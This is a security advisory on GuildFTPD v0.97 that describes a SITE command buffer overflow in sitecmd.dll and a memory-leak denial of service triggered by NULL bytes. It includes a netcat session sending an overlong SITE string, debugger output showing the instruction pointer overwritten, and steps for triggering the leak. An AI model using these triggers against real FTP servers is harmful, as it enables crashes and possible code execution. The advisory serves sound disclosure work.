COMMAND
GuildFTPD
SYSTEMS AFFECTED
GuildFTPD v0.97 (probably earlier versions too)
PROBLEM
Following is based on a Defcom Labs Advisory def-2001-27 by
Andreas Junestam and Janne Sarendal. GuildFTPD contains two
different problems:
1. Buffer overrun in the SITE command with the ability to execute
arbitrary code
2. A memory leak in the input parsing code
* SITE command Buffer Overflow
All the SITE commands are handled in a dll(sitecmd.dll) which
suffers from a buffer overflow. By sending a site command
greater than 261 bytes, a buffer will overflow and it is
possible to execute arbitrary code. We have choosen not to
include the working exploit.
C:\>nc 127.0.0.1 21
220-GuildFTPD FTP Server (c) 1999,2000
220-Version 0.97
220 Please enter your name:
user a
331 User name okay, Need password.
pass a
230 User logged in.
site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0
eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
* Memory Leak DoS
The input parsing code in GuildFTPD contains a memory leak that
will trigger if you send it a request containing a NULL(0x0)
character. GuildFTPD will still answer new requests, but,
eventually the server will run out of memory and the machine
will crash.
SOLUTION
This issue was brought to the developer's attention on the 24th of
April, 2001, no response so far.